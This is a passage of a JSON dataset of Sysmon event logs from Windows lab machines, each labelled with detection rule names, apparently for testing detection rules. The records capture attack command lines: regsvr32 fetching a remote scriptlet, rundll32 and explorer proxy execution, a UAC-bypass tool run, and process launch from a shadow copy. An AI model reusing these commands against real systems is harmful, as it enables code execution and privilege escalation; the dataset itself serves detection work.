22:49:09.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10153,"Execution":{"#attributes":{"ProcessID":1936,"ThreadID":1644}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T22:49:10.198351Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"cmd","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ParentProcessId":2892,"ProcessGuid":"365ABB72-D1AB-5CC8-0000-0010DB1E4400","ProcessId":1372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:52:27.588"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10154,"Execution":{"#attributes":{"ProcessID":1936,"ThreadID":1644}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T22:52:27.588976Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-433D-5CE0-0000-002031350100","LogonId":"0x13531","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-433C-5CE0-0000-00100FD20000","ParentProcessId":964,"ProcessGuid":"365ABB72-4612-5CE0-0000-00103D1E2600","ProcessId":2600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-18 17:51:14.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":18851,"Execution":{"#attributes":{"ProcessID":2044,"ThreadID":1636}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-18T17:51:14.254967Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" advpack.dll,RegisterOCX c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2B1B-5CD8-0000-0010CCC92500","ParentProcessId":3320,"ProcessGuid":"365ABB72-2B21-5CD8-0000-001039DD2500","ProcessId":816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 14:18:09.573"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16452,"Execution":{"#attributes":{"ProcessID":2036,"ThreadID":296}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T14:18:09.589507Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-12 13:56:12.329","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ProcessId":684,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\shdocvw.url","UtcTime":"2019-05-12 13:56:12.329"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16437,"Execution":{"#attributes":{"ProcessID":2036,"ThreadID":296}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:56:12.329626Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" shdocvw.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\shdocvw.url","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 12 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ParentProcessId":684,"ProcessGuid":"365ABB72-25FC-5CD8-0000-0010906A1300","ProcessId":2168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:56:12.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16438,"Execution":{"#attributes":{"ProcessID":2036,"ThreadID":296}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:56:12.652868Z"}},"Version":5}}}},{"detection":["XSL Script Processing"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"msxsl.exe c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat","Company":"Microsoft","CurrentDirectory":"D:\\","Description":"msxsl","FileVersion":"1.1.0.1","Hashes":"SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D2D4-5CE6-0000-001047EA6400","ParentProcessId":2236,"ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Command Line XSLT","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 17:26:08.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1017,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T17:26:08.716859Z"}},"Version":5}}}},{"detection":["XSL Script Processing"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"MSXML 3.0 SP11","FileVersion":"8.110.7601.23648","Hashes":"SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","ImageLoaded":"C:\\Windows\\System32\\msxml3.dll","ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Microsoft(R) MSXML 3.0 SP11","RuleName":"Execution - Suspicious Microsoft.XMLDOM module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-05-23 17:26:08.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":1018,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T17:26:08.947190Z"}},"Version":3}}}},{"detection":["Suspicious ftp.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /C c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\ftp.exe\" -s:c:\\users\\ieuser\\appdata\\local\\temp\\ftp.txt","ParentImage":"C:\\Windows\\System32\\ftp.exe","ParentProcessGuid":"365ABB72-55F1-5CD8-0000-00108A153300","ParentProcessId":3668,"ProcessGuid":"365ABB72-55F1-5CD8-0000-0010781C3300","ProcessId":2392,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:20:49.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16513,"Execution":{"#attributes":{"ProcessID":2012,"ThreadID":300}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T17:20:49.443464Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ProcessId":6292,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.257"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400701,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.276333Z"}},"Version":2}}}},{"detection":["Explorer Root Flag Process Tree Break","Proxy Execution Via Explorer.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"explorer.exe /root,\"c:\\windows\\System32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Administrator.ECORP\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=59AB8548708342C77C51F70EEC5CED0A88DC4701,MD5=6A65873EA949C5CCC72DDEF9E9780AA5,SHA256=16656BBB748BA1C811BB2C68D987DC0F5CAF149E41A84E45F6B6ECAAF7D29AB2,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959","Image":"C:\\Windows\\explorer.exe","IntegrityLevel":"High","LogonGuid":"6661D424-948B-5EEF-0000-002072300F00","LogonId":"0xf3072","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ParentProcessId":6292,"ProcessGuid":"6661D424-F4F6-5EFE-0000-0010E7EFF800","ProcessId":6860,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"ECORP\\Administrator","UtcTime":"2020-07-03 09:05:58.268"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":1,"EventRecordID":400702,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.278154Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"6661D424-9438-5EEF-0000-00104DA20000","ProcessId":792,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.319"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400703,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.364162Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"00000000-0000-0000-0000-000000000000","ProcessId":6860,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400707,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.619637Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\calc.exe","ProcessGuid":"6661D424-F4F6-5EFE-0000-0010C00AF900","ProcessId":3224,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\System32\\win32calc.exe","UtcTime":"2020-07-03 09:05:58.707"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400708,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.737753Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami /groups ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c whoami /groups ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE66-5CEB-0000-001058F50B00","ParentProcessId":3256,"ProcessGuid":"365ABB72-FE66-5CEB-0000-0010C7F80B00","ProcessId":1168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:38.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6170,"Execution":{"#attributes":{"ProcessID":980,"ThreadID":2220}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-27T15:12:38.290374Z"}},"Version":5}}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE6F-5CEB-0000-0010F4370C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-FE6F-5CEB-0000-0010D33A0C00","ProcessId":3344,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:47.456"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6182,"Execution":{"#attributes":{"ProcessID":980,"ThreadID":2220}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-27T15:12:47.478285Z"}},"Version":5}}}},{"detection":["Suspicious WMI Execution","Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE76-5CEB-0000-0010546E0C00","ParentProcessId":2356,"ProcessGuid":"365ABB72-FE76-5CEB-0000-001077710C00","ProcessId":2840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:54.515"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6190,"Execution":{"#attributes":{"ProcessID":980,"ThreadID":2220}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-27T15:12:54.544664Z"}},"Version":5}}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\update.hta\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\update.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9972-5D04-0000-0010F0490C00","ParentProcessId":3660,"ProcessGuid":"365ABB72-9AA6-5D04-0000-00109C850F00","ProcessId":652,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 07:13:42.278"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7648,"Execution":{"#attributes":{"ProcessID":2044,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-15T07:13:42.294109Z"}},"Version":5}}}},{"detection":["Rundll32 Without 